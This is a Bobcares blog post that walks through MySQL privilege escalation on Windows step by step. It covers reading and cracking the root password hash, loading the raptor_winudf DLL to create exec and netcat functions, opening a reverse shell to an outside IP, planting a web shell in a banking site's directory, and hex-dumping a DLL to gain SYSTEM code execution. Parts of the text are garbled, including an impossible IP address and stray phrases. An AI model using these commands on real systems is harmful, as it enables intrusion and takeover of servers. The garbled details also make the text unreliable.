Bobcares

MySQL Privilege Escalation Windows: Explained

by | Jul 26, 2022

Let’s look at MySQL privilege escalation in Windows in detail.

We can oversee and handle your MySQL privilege escalation issues in Windows at Bobcares with our MySQL support Service.

Do you want to know more? Continue reading and contact us if you have any additional queries.

MySQL Privilege escalation

mysql privilege escalation windows

An attacker can read the ROOT Password in the MySQL DATABASE if the user forgot to grant permission to the “DATA” folder after installing MySQL in the Windows operating system.

Example
  1. Goto : C://program files/mysql5.0.45/data/mysql
  2. READ —> user.MYD
  3. Crack it using CAIN & Able or any other available tools. root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

    The data is accessible and crackable. For instance, a cracked hash atop “Root:4321d”

A user can take advantage of the “RAPTOR” critical exploit, which Adds a Dynamic Library to MySQL and use it. This Library will act as a trojan (REVERSE SHELL, NETCAT) and infect the target cell.

RAPTOR

By using specific dynamic libraries that contain User Defined Functions, or UDFs, MySQL offers a mechanism by which the standard set of functions can be expanded. The UDF mechanism enables an attacker to install and run malicious code as root if MySQL has root privileges. This is one of the primary ways to perform the

To connect to MySQL, however, a user can use [asp, php,…] SHELL, PhpMyadmin, or Terminal (I connected using Mysql Shell in this example).

Download RAPTOR on Windows

A user can download Raptor in windows with a few simple steps as shown below. Firstly the user has to: http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203


- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//winudf.dll’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘c://windows//system32//winudf.dll’;
-CREATE FUNCTION netcat RETURNS integer SONAME ‘winudf.dll’;
-CREATE FUNCTION exec RETURNS integer SONAME ‘winudf.dll’;
-DROP TABLE foo;

After this process, the user type in: select * from mysql.func;

The user can run Command in Administrator Privilege, for example :

– mysql> select exec(‘echo foo > c:\\bar.txt’); – mysql> select netcat(’193.347.1.368′);  Remember to change it to  (’192.168.0.147′)

Technical Information: Reason

It appears to have something to run the scripting code once it is ready because Mysql 5 and later have a scheduler available that is comparable to SQLAgent and the job scheduler in Oracle. It won’t activate by default.

Mysql allows for the creation of procedures and functions, but since there is no scripting language available, they are only capable of using basic loops and conditions along with SQL statements. Even the ability to write to and read from disks to save results and read files is under restriction. But this process has limitations.

However, Mysql incorporates a useful addition to its functionality: UDF (User Defined Functions). This makes it possible to define user functions, implement them in C++, compile them, and use them from Mysql just like any other database function. Since these functions are dynamically loaded from the plugin directory (as of version 5.1) and may be used from the database normally, it is not necessary to recompile the entire database code. This paves the way for MySQL privilege escalation in windows

Alternative Attack Method

A user who has MySQL’s Root Privilege can use ROBOTIC ARM to Move files and grant them Admin Privilege.

Example

use mysql; – create table foo(line blob); -insert into foo values(load_file(‘c://windows//temp//shell.aspx’)); -UNLOCK TABLES; -SELECT * FROM mysql.foo INTO DUMPFILE ‘e://hosting//ebanking//shell.php’;

Look at the Windows installation of MySQL to see that it is running as a service with system privileges, meaning that any code running in the context of the MySQL process is running as the SYSTEM user. This process refers to MySQL privilege escalation.

Performing the exploit

Assuming the presence of a vulnerability: “Unauthenticated phpMyAdmin Interface” here. This method still works even if the user is unable to access the phpMyAdmin interface but has managed to write files to the MySQL plugin directory. The path to the plugin directory must be known in order to grant the system more privileges. Additionally, a ‘dumpfile’ function will be used to write files to the plugin directory.

  1. Firstly, list all of the plugins for MySQL. Select @@plugin_dir;
  2. The data inside the plugin/DLL file needs to be translated into hexadecimal form. This can be done by a user copying Python’s one-liner.

    python -c “from binascii import hexlify; print ‘select 0x’+hexlify(open(‘udf.dll’,’rb’).read())+’ into dumpfile ‘c:wampbinmysqlmysql5.5.20libpluginudf_test.dll””

    With the command above, automatically create a SQL query that is applicable in the following step.

  3. Following that, only use the dumpfile function to write to the plugin directory. Then, to use in the current memory context, create the sys eval function. and finally, Code Execution as SYSTEM.

    [Need assistance with similar queries? We are here to help]

    Conclusion

    To conclude, the MySQL privilege escalation in windows refers to the privilege for the user to access the MySQL privileges. A user can perform the MySQL privilege escalation by following a simple set of steps and tools.

    PREVENT YOUR SERVER FROM CRASHING!

    Never again lose customers to poor server speed! Let us help you.

    Our server experts will monitor & maintain your server 24/7 so that it remains lightning fast and secure.

    GET STARTED

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

Never again lose customers to poor
server speed! Let us help you.